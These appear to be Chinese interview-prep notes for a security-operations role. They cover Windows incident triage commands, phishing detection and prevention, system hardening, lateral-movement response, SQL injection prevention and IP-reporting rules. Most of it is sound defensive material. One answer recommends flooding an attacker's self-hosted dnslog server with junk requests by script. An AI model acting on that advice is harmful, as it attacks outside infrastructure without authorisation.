是否公開查看服務器是否有可疑賬號：cmd輸入lusrmgr.msc命令查看服務器是否存在隱藏賬號、克隆賬號結合日志，查看管理員登錄時間，用戶名是否存在異常
2、檢查異常端口、進程檢查端口連接情況，是否有遠程連接、可疑連接：a、netstat -ano查看目前的網絡連接，
定位可疑的ESTABLISHEDb、根據netstat 定位出的pid，再通過tasklist命令進行進程定位 tasklist | findstr “PID”
3、檢查啟動項、計劃任務、服務win+r：輸入msconfig，查看異常啟動項win+r：輸入regedit，打開注冊表，查看開機啟動項
4、檢查系統相關信息win+r：輸入systeminfo查看系統信息
5、日志分析win+r：輸入eventvwr.msc,打開事件查看器導出應用程序日志，安全日志，系統日志，利用log parser分析

如何判斷是釣魚郵件

• 以公司某部門的名義，如安全部、綜合部，使用正式的語氣，內容涉及到賬號和密碼等敏感信息，可能帶有鏈接地址或附件，制造緊張氛圍，比如24小時內今日下班前完整賬號密碼修改。
• 看發件人 設備上也會報IP 上微步查一下IP是不是惡意IP 郵件的發件人和內容是不是正常的業務往來
• 附件放到沙箱里 看看是否有問題
• 有的郵件會提示你郵件由另一個郵箱代發，或者郵箱地址不是本公司的，再或者郵箱地址是qq或者163等個人郵箱的，那就更沒跑了

怎么防范郵件釣魚

定期組織員工安全講座，提供員工的安全意識，企業內郵件系統使用可信賴的郵件服務，員工企業郵箱不得使用弱口令等，如果被感染了也要讓大家清楚該做什么，例如直接拔網線等操作

針對dnslog的反制

對于常見的dnslog平臺，直接屏蔽，如果是自己搭建的dnslog平臺，批量的去ping，惡意制造各種垃圾dnslog數據，讓他無法獲取到有效的信息，具體可以寫一個腳本進行批量探測存活，httplog也一樣，使用爬蟲批量進行request請求

網絡基線加固思路

先看防護軟件有沒有升級，先升級最新版本，進行全盤掃毒，查看高危端口，高危服務，查看主機有沒有被爆過漏洞的軟件
windows：重命名administrator賬戶、禁用GUEST賬戶、清理系統無效賬戶、配置密碼策略賬戶鎖定策略 Linux：刪除無用賬號、檢查特殊賬號、添加口令策略、禁止root直接登錄、設置隱藏文件屬性、關閉不必要服務、更改ssh端口號防爆破

怎么修改TTL值

windows下是修改Default注冊表文件，linux是修改etc/sysctl.conf文件

一臺主機在內網進行橫向攻擊，你應該怎么做

確定攻擊來源，是不是員工內部誤操作，比如詢問運維是否有自動化輪訓腳本。如果沒有，確定是攻擊，結合時間點，根據設備信息，看一下安全事件，進程，流量，找到問題主機，開始應急響應流程：準備，檢測，遏制，根除，恢復，跟蹤，具體的操作要交給現場運維去處理。

SQL注入的預防

預編譯
PDO
正則表達式過濾

如何查看當前進程？

Ps -ef 或 ps -aux

臨時目錄是哪個文件夾？

/tmp ，/var/tmp

用戶列表是在哪個目錄下(如何查看Linux有哪些用戶)

/etc/passwd

和甲方上報 IP 地址，你要上報哪些地址呢？

上報攻擊 ip 的地址，先判斷是內網 ip 還是公網 ip，如果是內網ip，查看是否是業務白名單行為，若不是再上報進行判斷。若是公網 ip，查看是否在白名單內，若不是查看是否是掃描器 ip，若是掃描器 ip，掃描對業務或者對研判產生了影響則可以上報，若不是且判斷出是真實攻擊 ip 也進行上報。